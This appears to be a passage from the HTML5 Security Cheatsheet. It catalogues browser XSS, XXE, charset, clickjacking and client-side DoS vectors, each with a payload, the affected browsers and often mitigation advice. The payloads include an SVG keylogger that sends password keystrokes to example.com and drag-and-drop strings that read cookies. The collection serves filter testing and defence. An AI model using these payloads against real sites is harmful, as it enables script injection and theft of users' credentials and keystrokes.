This example shows how SVG markers allow insertion of external links with JavaScript URI into the current document.
<svg xmlns="http://www.w3.org/2000/svg"> <path d="M0,0" style="marker-start:url(test4.svg#a)"/> </svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>required_mime: image/svg+xmlcrossdomain: 1path: http://html5sec.org/test4.svgname: test4.svg
- Opera 10.X
- Opera 11.52
SVG chameleon behavior via embedded XSLT#125test
This SVG chameleon file can be embedded via <embed> on most, and via <img> on most modern browsers. Thanks to the embedded XSLT stylesheet, it will change it's appearance, depending on how it is embedded or displayed. In an <img> tag it just shows a red dot. But opened directly or via an <iframe> or <embed>, the XSLT turns all SVG into (X)HTML and an alert will show. While most modern browsers show this behavior, Opera will completely mess it up, and show an alert when used via <embed> and an <iframe> when used via <img> (!). Chrome will show a broken image and an alert.
<?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>
- Internet Explorer 9.0
- Internet Explorer Latest
- Firefox 3.X
- Firefox Latest
JavaScript execution on Opera via listener delegation#127test
The example vector - relating to #94 - shows how a combination of listener and hander tags can be used to delegate a load event from the SVG element to trigger actual JavaScript execution. So far only Opera supports the usage of XML events and related elements in this context. No user interaction is required to execute the JavaScript.
<svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(1)</handler> </svg>
- Opera 9.0
- Opera 12.0
Firefox parsing entity encoded HTML in SVG#128test
Firefox 4 allows HTML entities used in plain-text tags such as style, nostyle, noframes and others to represent their canonical form. This leads to possibilities bypassing filters despite of proper HTML encoding as the example demonstrates - especially when inline SVG and innerHTML copy access are being used. This bug has been fixed in most recent Firefox versions.
<svg><style><img/src=x onerror=alert(1)// </b>
- Firefox 4.0
Opera active JavaScript execution via STYLE in SVG#129test
Additional to script execution via "xlink:href" in SVG elements such as <image>, <animation>, <foreignObject>, Opera 11 allows to utilize filters (as well as other CSS properties listed in #109) to accomplish the same. Note that either these CSS properties, as well as the analogous attributes (the filter attribute in particular) can be used in this case. Both style and analogous attributes in inline SVG should be considered unsafe.
<svg> <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>")'> <!-- Same effect with <image filter='...'> --> </svg>
Do not allow style and filter attributes inside user generated SVG data. It's considerably the best to generally avoid user generated SVG data - if possible.
- Opera 11.60
- Opera 12.0
SVG <set> and <animate> elements allow key-logging w/o JavaScript#132test
It is possible to achieve an injection capable to exfiltrate keyboard events without any JavaScript execution via SVG and set/animate timing attributes. In essence, an access key can be specified to trigger events inside an SVG. In case an inline SVG is being used, the listener for these keys observes the whole document - and not just the SVG itself. This means that even keystrokes into a form input trigger the SVG access key handler. Once this access key handler is being combined with adding a new keystroke-depending image source to an existing image, the form input will be filled, and the SVG will reset a hidden image source according to the key being pressed and thereby silently exfiltrate the data. Since all this works without using any JavaScript, it was also possible to execute this attack in latest Thunderbird versions - with the vector invisibly wrapped inside the mail-body. The problem has been reported and fixed, CVE-2011-3663 has been assigned. Current stable versions of Firefox still allow to observe the problem - using a network traffic monitor/Firebug is recommended.
<!doctype html> <form> <label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label> <br> <input name="secret" type="password"> </form> <!-- injection --><svg height="50px"> <image xmlns:xlink="http://www.w3.org/1999/xlink"> <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> </image> </svg>
- Firefox 4
- Firefox Latest
Executing JavaScript via "from" attribute in SVG and inline-SVG#137test
It is commonly known, that the <animate> element in combination with the "to" parameter can be used to change existing attributes to potentially active values and cause arbitrary script execution. It is nevertheless also possible to use the "from" attribute for the very same purpose - albeit this being rather counter-intuitive. The given example code snippet describes an SVG containing a circle that encapsulates an <animate> element. This uses the "from" attribute to set the "href" attribute of the link encapsulating the circle to a JavaScript URI. Clicking the circle will execute the JavaScript.
<svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(1)" to="&" /> </a>
Avoid inline-SVG in combination with user-generated content. In case SVG needs to be used, avoid potentially harmful content for "to", "from", "values" and "by" attributes.
- Firefox 25.0
- Firefox Latest
- Opera 15.0
- Opera Latest
- Chrome 30.0
- Chrome Latest
- Safari 5.0
- Safari Latest
Executing JavaScript using ES6 Template Strings in SVG#141test
The new language features shown in #140 can also be used in the context of an SVG image. Here, the named entity of the back-tick, the ` can be used to initiate execution of a function or method.
<svg><script> alert`1` <p> <svg><script> alert`1` <p>
Make sure that your IDS, filter and other protective systems are aware of the fact, that in SVG, HTML-encoded back-ticks (U+0060) are now capable of initiating execution of methods and functions in JavaScript.
- Firefox 34.0
- Firefox Latest
Vectors related to X(HT)ML
Opera XML-stylesheets executing JavaScript#17test
Opera 9.x and 10.0 allow to apply XML-stylesheets with JavaScript URIs and. The vectors even works if the page is delivered as text/html.
<?xml-stylesheet href="javascript:alert(1)"?><root/>
Make sure that user input cannot contain XML stylesheets or tags not consisting of <\w+ - because this vector would only be matched via <\?\w+ but still executes JavaScript without user interaction. Avoid blacklists is possible.
- Opera 9.X
- Opera 10.10
Entities inside <SCRIPT> and comparable tags#18test
By specification user agents allow using HTML entities between <SCRIPT> and <STYLE> tags in case the document is being delivered and rendered as X(HT)ML.
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
Make sure filters and detection systems consider the fact of having entities to be allowed inbetween <SCRIPT>, <STYLE> and other tags - and not only in attributes.
- Opera 8.X
- Opera Latest
- Firefox 1.X
- Firefox Latest
- Chrome 3.0
- Chrome Latest
- Safari 5.0
- Safari Latest
- Internet Explorer 9.0
- Internet Explorer Latest
Arbitrary payload injection via XML External Entities (XXE)#64test
Chrome and Safari allow using external XML entities to reference payload for an entity. The example shows that the entity &x; is now being filled with the content of the given file. The document must be delivered as XML or XHTML. Note that the absolute URL for the source of XXE is required.
<!DOCTYPE x[<!ENTITY x SYSTEM "http://html5sec.org/test.xxe">]><y>&x;</y>
In case an attacker can inject data into the DOCTYPE area of the targeted website it's easy to fool filtering mechanisms since the actual payload is hidden in a harmless looking entity. Make sure no injections in that area are possible.
<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>crossdomain: 0path: http://html5sec.org/test.xxename: test.xxe
- Chrome 3.0
- Chrome Latest
- Opera 16.0
- Opera Latest
- Safari 3.0
- Safari Latest
Opera XML-stylesheets executing JavaScript (2)#66test
Opera supports xml-stylesheet via data URIs. There are many ways to execute javascript using the XSL (XSLT). If you put this code in an external file on the same domain, then it will work in all browsers. It is also possible appeal to the code of the stylesheet by id (href = "#xss"), when the stylesheet implemented in the current document.
<?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>
- Opera 8.0
- Opera 12.0
XML ATTLIST declaration causing JavaScript execution#67test
XML ATTLIST declarations can be used to create attributes and assign values for matching tags inside the DOCTYPE declaration. By chosing the right namespace and attribute combinations it's possible to create an ATTLIST declaration causing JavaScript execution without user interaction.
<!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "xx:x" onerror CDATA "alert(1)" onload CDATA "alert(2)"> ]><img />
In case a website is being delivered as XML or XHTML make sure an attacker has no possibility to inject data into the DOCTYPE or create new ATTLIST directives.
- Chrome 4.0
- Chrome Latest
- Safari 3.0
- Safari Latest
- Firefox 3.0
- Firefox Latest
- Opera 8.0
- Opera Latest
Passive JavaScript execution via XLinks#68test
Gecko based browsers like Firefox allow using XLinks. Those can be equipped with a JavaScript URI to execute JavaScript in case the user clicks on one of those XLinks.
<doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:alert(1)" xlink:type="simple">XXX</x> </doc>
- Firefox 3.0
- Firefox 3.6.28
Opera WML JavaScript execution via timer event#69test
Opera supports WML files - Wireless Markup Language. As soon as a file has the extension .wml Opera assumes it's a WML and renders it accordingly. With a timer event and a connected redirect it's possible to execute JavaScript without user interaction.
<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:alert(1)"/></onevent><timer value="1"/></card>
- Opera 9.X
- Opera 12.0
Arbitrary payload injection via XML external DTD in IE#76test
IE will render doctype-provided entities in the "html" namespace as soon as a user defined XML stylesheet tag is present. The example works up to IE8 standards mode.
<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "test.dtd"><x>&x;</x>
<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='alert(1)'/>">crossdomain: 1path: http://html5sec.org/test.dtdname: test.dtd
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
XML JavaScript execution via style attribute in IE#77test
IE supports the style attribute in xml-pages too. Thus JavaScript can be executed via expression() with any given tag. The example works up to IE 7 standards mode.
<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
- Internet Explorer 6.0
- Internet Explorer 10.0
Arbitrary payload injection via XSL + XDR-schema in IE#78test
The namespace "html" is automatically determined using XSL. Missing attributes for the <img> tag such as "onerror" are obtained from the XDR-schema - and will then execute JavaScript. The example works up to IE 8 standards mode.
<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:test.xdr"/>
<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="alert(1)"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>crossdomain: 1path: http://html5sec.org/test.xdrname: test.xdr
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
Active JavaScript execution via XLink#81test
FF supports the "xlink:actuate" attribute and allows displaying XML link without additional styles. The default namespace here is "html".
<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
- Firefox 3.0
- Firefox 3.6.28
JavaScript execution via XML stylesheet, data URI and expression()#82test
Internet Explorer 8 to 10 support data URIs and thus are capable of including stylesheets this way. By using a xml stylesheet tag and a data URI containing an expression() it's possible to execute JavaScript without user interaction.
<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
- Internet Explorer 8.0
- Internet Explorer 10.0
Obfuscated WML injection via undeclared WAP-ML Variables#83test
The example demonstrates the use in WML undeclared variables (are ignored). These variables can be declared in the tags <setvar>, <input>, <select>. Namespace indicated for use inside the XML-file. Also inside WML-files can you use a lot of regular HTML-tags.
<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
- Opera 9.X
- Opera 12.0
Opera JavaScript execution via XML-events handler#84test
The browser tries to load an external XML-event handler and execute JavaScript without user interaction. The problem seems to be fixed in Opera 11.
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
- Opera 9.X
- Opera 11.01
Arbitrary payload injection in Opera via XML-events handler#85test
The browser loads an external xml-event handler, which contains the JavaScript code. This example also works with data URIs.
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
<script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>crossdomain: 1path: http://html5sec.org/test.evtname: test.evt
- Opera 9.X
- Opera 12.0
Executing JavaScript with WD-XSL, <eval> elements and "expr" attributes#135test
Internet Explorer, when loading an XML document in an older document mode, allows the use of a legacy XSL version called WD-XSL. This version, shipped with several proprietary extras, allows execution of JavaScript and other script code in very uncommon ways. The browser for instance supports an <eval> element and "expr" attributes that can directly be fed with script code or references to existing JavaScript and XMLDOM methods. Other than MSXSL script, direct DOM access is possible with the use of WD-XSL.
<?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval> <if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if> </template> </stylesheet>
Websites rendered in XML- or XML-like MIME types should not allow untrusted input without heavy filtering. Unknown elements can cause unexpected script execution depending on browser and render mode. The use of custom namespaces in user generated input should be prohibited.
- Internet Explorer 5.5
- Internet Explorer Latest (In Older Docmodes)
UTF7 and other exotic charset based vectors
XSS via x-imap4-modified-utf7 (1)#2test
This vector shows how UTF7 derivations can be used to generate very hard to detect XSS vectors in exotic charsets
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
Make sure no <META> tags can be injected and the website is delivered with a charset.
- Firefox 2.X
- Firefox 3.6.28
XSS via x-imap4-modified-utf7 (2)#3test
This vector shows how UTF7 derivations can be used to generate very hard to detect XSS vectors in exotic charsets
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
Make sure no <META> tags can be injected and the website is delivered with a charset.
- Firefox 2.X
- Firefox 3.6.28
XSS via ¼ and ¾ in MacFarsi, MacArabic and MacHebrew#19test
Buggy charset implementations in Firefox allow to craft HTML structures without using the usual characters such as < and >. Most affected charsets are from the Mac charset family - such as mac-farsi, mac-arabic and mac-hebrew.
<meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
User input should never allow <META> tags to avoid re-setting the charset. In case the website is encoded in one of the affected charsets make sure to have your filter be aware that for Firefox < (<) and ¼ are equivalent - as well as other characters too.
- Firefox 2.X
- Firefox 3.6.28
Client side denial of service vectors
Client-side denial of service via repeat templates#13test
This vector uses the repeat template syntax specifies in the WebForms 2.0 draft. By using nested tags repeating themselves all over again the client can be forced to deny service or even crash.
<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
Avoid allowing users submitting HTML containing repeat or "repeat-start"/"repeat-end" attributes. If necessary validate the numerical values used for them to be reasonably small.
- Opera 10.0
- Opera 10.10
Client-side denial of service via faulty regular expressions#14test
Opera 10 allows client side validation via the pattern attribute. In case the pattern value is a badly written regex the client can be "dossed" with short customized character sequences.
<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
Don't allow users to submit HTML containing "pattern" attributes and make sure your own client side regular expressions used for validation are well written and not vulnerable against easy ReDoS attacks.
- Opera 10.0
- Firefox 12.0
- Firefox Latest
Input stealing/form DoS with onblur=focus() and autofocus#22test
This very basic vector demonstrates how the combination of "autofocus" and "onblur" can render any other form on the targeted website useless.
<input onblur=focus() autofocus><input>
User submitted markup should not contain "autofocus" attributes.
- Opera 9.0
- Opera Latest
- Chrome 3.0
- Chrome Latest
- Safari 5.0
- Safari Latest
HTML behavior and binding vectors
Using onbegin and HTML+TIME to execute JavaScript#16test
The HTML+TIME behavior allows to use arbitrary tags to execute JavaScript via onbegin event handlers.
X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags. The rather unknown HTML+TIME API provides too many ways to execute JavaScript with and without user interaction on exotic ways. Avoid blacklists if possible.
- Internet Explorer 5.5
- Internet Explorer 8.0
JavaScript execution via HTML+TIME without user interaction (1)#24test
This obfuscated vector uses HTML+TIME to execute JavaScript without user interaction - and without suspicious event handlers but just "attributename" and "to" attributes.
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags. The rather unknown HTML+TIME API provides too many ways to execute JavaScript with and without user interaction on exotic ways. Avoid blacklists if possible.
- Internet Explorer 5.5
- Internet Explorer 8.0
JavaScript execution via HTML+TIME without user interaction (2)#28test
This HTML+TIME vector utilized the attributes "attributename" and "values" to map encoded markup into an attribute to execute JavaScript.
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
As soon as the HTML+TIME namespace and the behavior property are mapped to a HTML element a whole range of new attributes to execute JavaScript is available. In user submitted html "xmlns" attributes should not be allowed - as well as "behavior" properties for style tags and attribtes. Don't rely on blacklisting when dealing with user submitted markup.
- Internet Explorer 5.5
- Internet Explorer 8.0
VML frame with embedded VML object plus onmouseover#34test
A VML frame object works by giving the VML frame a "src" attribute and have it point to another VML object. A VML frame object in quirks mode can enclose a VML rect object or regular HTML which is responding to mouseover events.
1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags.
<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>crossdomain: 1name: test.vml
- Internet Explorer 5.5
- Internet Explorer Latest (In Older Docmode)
VML line object utilizing href attribute with JavaScript URI#35test
The vector paints a very thick and wide line responding to clicks with JavaScript execution via JavaScript URI. Note that the actual URI is being masked in the status bar. During an overlay attack the victim will not know about the payload via status bar.
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags.
- Internet Explorer 5.5
- Internet Explorer Latest (In Older Docmode)
AnchorClick behavior enabling folder attribute as href replacement#36test
Using the AnchorClick behavior allows to use the "folder" attribute as replacement for a "href" attribute on <A> elements. This example works up to IE 8 standards mode.
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags.
- Internet Explorer 5.5
- Internet Explorer Latest (In Older Docmode)
Internet Explorer Scriptlets executing JavaScript#52test
Internet Explorer supports Scriptlets as an alternative binding method for Data Islands. By using the shown examples JavaScript will execute without user interaction.
<x style="behavior:url(test.sct)">
Users should not be able to either submit CSS or HTML containing style attributes. If necessary make sure the "behavior" property is not whitelisted.
<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">alert(1)</SCRIPT> </SCRIPTLET>crossdomain: 0name: test.sct
- Internet Explorer 5.5
- Internet Explorer Latest (In Older Docmodes)
Internet Explorer Data Islands executing JavaScript#53test
Internet Explorer supports Data Islands as an XMLish binding method. By using the shown examples JavaScript will execute without user interaction.
<xml id="xss" src="test.htc"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
Users should not be able to submit HTML containing <XML> tags. If necessary make sure the "dataformatas" and "datasrc" attributes are not whitelisted.
<?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=alert(1)>]]></payload> </x>crossdomain: 0path: http://html5sec.org/test.htcname: test.htc
- Internet Explorer 5.5
- Internet Explorer Latest (In Older Docmodes)
Server-sent events - Opera and <EVENT-SOURCE> tags (1)#73test
Opera allows using <EVENT-SOURCE> elements. In case the "src" attribute points to a valid cross domain source it's possible to have the element listen for events and the containing data.
<event-source src="event.php" onload="alert(1)">
Make sure users cannot influence the source of <EVENT-SOURCE> elements and don't whitelist the tag itself inside user submitted markup.
<?php header("Content-Type: application/x-dom-event-stream"); die("Event: load\ndata: \n\n"); ?>crossdomain: 1path: http://html5sec.org/event.phpname: event.php
- Opera 8.X
- Opera 10.63
Server-sent events - Opera and <EVENT-SOURCE> tags (2)#74test
Opera allows using <EVENT-SOURCE> tags to receive server-sent events. In this example a data URI is being used as an event source triggering a click on another HTML element. In an attack scenario an XSS requiring user interaction can be turned into an active script execution this way.
<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
Make sure users cannot influence the source of <EVENT-SOURCE> elements and don't whitelist the tag itself inside user submitted markup.
- Opera 8.X
- Opera 10.63
Internet Explorer applying behavior via <import namespace>#116test
Internet Explorer allows to apply namespaces and attach behaviors not only by using CSS but <import> or <?import> tags. The example shows how to work with HTML+TIME behaviors without using style attributes or tags and cause script execution via the to attribute. If there is no attribute "targetElement", will be overridden "innerHTML" property of the <body> tag. To limit the area that be changed, you can use the attribute "targetElement". This syntax is also supported in IE9 for non-obsolete behaviors.
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=alert(1)>">
- Internet Explorer 6.0
- Internet Explorer 8.0
Clickjacking and UI Redressing vectors
Reverse clickjacking via <IFRAME>#117test
Internet Explorer allows to place <IFRAME> tags inside <A> tags. By clicking on a not clickable element inside the IFRAME there will be executed the URL defined in the "href" attribute of the <A> tag.
<a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>
- Internet Explorer 8.0
- Internet Explorer 9.0
Text injection by drag-and-drop#118test
The method "setData" allows, with the event handler "ondragstart" and the attribute "draggable" with the value "true", to drag the text "malicious code" and not "Drop me" into the IFRAME. This IFRAME can consist of a web page with an input field to drop in data. Note that cross-origin drag&drop has meanwhile been heavily restricted in power due to security risks.
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div> <iframe src="http://www.example.org/dropHere.html"></iframe>
- Opera 12.0
- Firefox 3.X
- Firefox 15.0
- Safari 5.0
- Safari 5.1.7
Content extraction via view-source#119test
To show the source code of a web page inside the web browser Mozilla Firefox or Google Chrome, "view-source:" can be used as a prefix for the URL. Firefox - and that is essential for this vector - allows iframes to show view-source: URLs. With the combination of a "textarea" tag, just two drags to perform this attack are needed, as in the case of elements like images. The first drag is to select an element and the second to drag an element out of the iframe into the text area. This method also bypasses CSS and JS based clickjacking protection.
<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe> <textarea type="text" cols="50" rows="10"></textarea>
- Firefox 2.X
- Firefox 13.0
Pop-up blocker bypass#120test
A web browser like Firefox distinguishes between trusted and not trusted events, depending on the situation. User interactions like a click will be trusted for the reason that they are made explicitly by the user. If a web page initiates an event like opening a pop-up window automatically, the event is not trusted and therefore blocked. Tests have shown that other browsers like Google Chrome or Opera behave similarly. With the use of clickjacking techniques, an attacker can get its victim to create a trusted event by clicking on a link that opens one or more pop-up windows. Thus, an attacker can get the victim to unknowingly trigger a trusted event by doing a click. This event can be recycled by an attacker for later usage or directly used to e.g. generate pop-up windows that the user does not desire.
<script> function makePopups(){ for (i=1;i<6;i++) { window.open('popup.html','spam'+i,'width=50,height=50'); } } </script> <body> <a href="#" onclick="makePopups()">Spam</a>
- Internet Explorer 5.0
- Internet Explorer 9.0
- Firefox 2.X
- Firefox Latest
- Chrome 6.0
- Chrome 23.0
- Safari 5.0
- Safari 5.1.7
SVG masking#121test
Masking elements can greatly simplify a clickjacking attack. Here, a "body" tag with the "style" attribute "background:gray" is given. As the name suggests, the background of the web page will have the color gray. The "iframe" tag holds the attributes "src" and "style". The URL of the target web page is the value of the "src" attribute. Inside the "style" attribute there is information to the width, the height, and the border of the web page. Finally, there is the property "mask" with "url(#maskForClickjacking)". This "url" points to an SVG with the "id" value "maskForClickjacking". On the next line, an "svg" tag with the namespace "svg" is defined. After that, a "mask" tag with the attributes "id", "maskUnits" and "maskContentUnits" is inside the "svg" tag. The attribute "id" holds the value "maskForClickjacking", which is exactly the value inside the "url". The attribute "maskUnits" defines the coordinate system for the data of "x", "y", "width" and "height". The second attribute "maskContentUnits" defines the coordinate system for the contents of the "mask" with "objectBoundingBox". Inside the "mask" tag, there are two tags called "rect" and "circle". Each tag holds information to the position and is determined by the geometric shape the width and height or radius. The attribute "fill", with the value "white", ensures that the viewing whole in the mask is visible.
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:svg="http://www.w3.org/2000/svg"> <body style="background:gray"> <iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/> <svg:svg> <svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"> <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/> <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/> </svg:mask> </svg:svg> </body> </html>
- Firefox 3.X
- Firefox Latest
Sandboxed Iframes#122test
Google Chrome implements the HTML5 "sandboxed iframes". This particular example shows on how to turn this feature against websites only using JavaScript based frame-busters. Note that the framed website can still execute JavaScript - but has no privileges to modify the top frame's location. This would only be possible if the sandbox attribute also came with the "allow-top-navigation" parameter.
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
- Chrome 8.0
- Chrome Latest
- Internet Explorer 10.0
- Internet Explorer Latest
- Safari 5.1.7
- Safari Latest
- Opera 15.0
- Opera Latest
Classjacking with jQuery#123test
CSS offers the attribute "class" as a selector to style a group of HTML elements. Consequently, it is feasible to style e.g. "span" and "a" tags. Here, the "span" tag has the value "foo" and the "a" tag the value "bar" inside the "class" attribute. This values can be used to define the font size or other CSS-specific properties. The first "script" tag holds an "src" attribute with the value "http://code.jquery.com/jquery-1.4.4.js". It is a reference to a file of the "jQuery JavaScript Library v1.4.4". The name "jQuery" stands for a JavaScript Library that simplifies HTML document traversing, event handling, animating, and Ajax interactions. So it is ideally suited to deal with user interactions and to manipulate them, as required for complex UI redressing attacks. Thus, "jQuery" is given in the second "script" tag. At first, the "span" tag is selected, which holds the value "foo" in the "class" attribute. After that, ".click" is implemented. It can be used to bind an event handler to the "click" JavaScript event, or to trigger that event on an element. In this case, an alert window will be executed with the text "foo" after clicking on the "Some text" value of the "span" tag. After closing the alert window, a click event is triggered on the "a" tag with the value "bar" inside the "class" attribute. Analogue to the first event, an alert window appears with the text "bar". After closing the alert window, the web browser will redirect the web page to "http://html5sec.org". If there is a click on the link "http://www.example.org" and not on the text "Some text", an alert window is displayed with the text "bar" followed by a redirection to "http://example.org" and not "http://html5sec.org". This behaviour follows from the "href" attribute.
<span class=foo>Some text</span> <a class=bar href="http://www.example.org">www.example.org</a> <script src="http://code.jquery.com/jquery-1.4.4.js"></script> <script> $("span.foo").click(function() { alert('foo'); $("a.bar").click(); }); $("a.bar").click(function() { alert('bar'); location="http://html5sec.org"; }); </script>
- Internet Explorer Latest
- Opera 10.X
- Opera Latest
- Firefox 2.X
- Firefox Latest
- Chrome 8.0
- Chrome Latest
- Safari 5.0
- Safari Latest
Passive XSS via Drag&Drop of specially crafted URIs#131test
It is possible to bypass Mozilla Firefox (tested on version 8.x and 9.x) internal protection and execute JavaScript Drag and Drop by using capitalization and Feed protocol, and to run that JavaScript on the top page if you can include the malicious page in an IFrame. The "event.preventDefault()" method in "ondragover" event of the element is to block the natural function of the browser. Usually the malicious IFrame should deceive the user to drag and drop a JS to the drop box which can be concealed in a hidden "Textarea" element.
<b>drag and drop one of the following strings to the drop box:</b> <br/><hr/> jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b> <br/><hr/> feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> <div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>
- Firefox 6
- Firefox 10.0.2